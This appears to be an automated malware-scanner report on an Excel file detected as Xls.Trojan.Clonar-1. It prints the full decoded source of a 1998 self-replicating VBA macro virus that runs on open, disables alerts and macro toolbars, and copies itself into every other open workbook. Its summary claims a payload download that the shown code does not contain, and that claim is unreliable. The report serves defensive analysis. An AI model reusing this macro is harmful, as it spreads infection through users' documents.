MALICIOUS
300
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
This Excel file contains a critical Auto_Open VBA macro, indicating it is designed to execute malicious code upon opening. The presence of ClamAV detections for 'Xls.Trojan.Clonar-1' strongly suggests a known trojan family. The macro's likely purpose is to download and execute a secondary payload, a common technique for this type of threat.
Heuristics 6
-
ClamAV: Xls.Trojan.Clonar-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Clonar-1
-
Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGEA CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 18,776 bytes but its declared streams total only 0 bytes — 18,776 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMSThe file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2978 bytes |
SHA-256: eab0d60a590e10ef0091610b1b5657f576248a95e93c507b87f65da47f531e97 |
|||
|
Detection
ClamAV:
Xls.Trojan.Clonar-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Diablos"
' Diablos Macro
' Bios Virus Macro - (C) Copyright 1998 - Spalaci
Sub auto_open()
Attribute auto_open.VB_Description = "Macro grabada el 5/07/98 por Epson"
Attribute auto_open.VB_ProcData.VB_Invoke_Func = "D\n14"
' Disable Menssages
Application.DisplayAlerts = False
' Disable Tools + Keys
Set Bar1 = CommandBars("Macro")
Bar1.Enabled = False
Set Bar2 = CommandBars("Visual Basic")
Bar2.Enabled = False
' Clonar Codigo Diablos
ThisWorkbook.VBProject.VBComponents("Diablos").Export ("C:\Windows\Diablos.bas")
' Clean + Infeccion
For Each I In Workbooks
If I.Name <> ThisWorkbook.Name Then
For Each J In I.VBProject.VBComponents
If J.Name = "Diablos" Then
I.VBProject.VBComponents.Remove I.VBProject.VBComponents("Diablos")
End If
Next J
I.VBProject.VBComponents.Import ("C:\Windows\Diablos.bas")
End If
Next I
' Label
If Day(Date) = 30 Then
CommandBars.LargeButtons = True
End If
' Enable Messages
Application.DisplayAlerts = True
End Sub
|
|||
embedded_office_off000060a8.ole |
embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x60A8 | 18776 bytes |
SHA-256: e5fef41f8d67b80e6d57c6eaa487fa52b4e4231b9bc57c7394ac9d85e82453c4 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.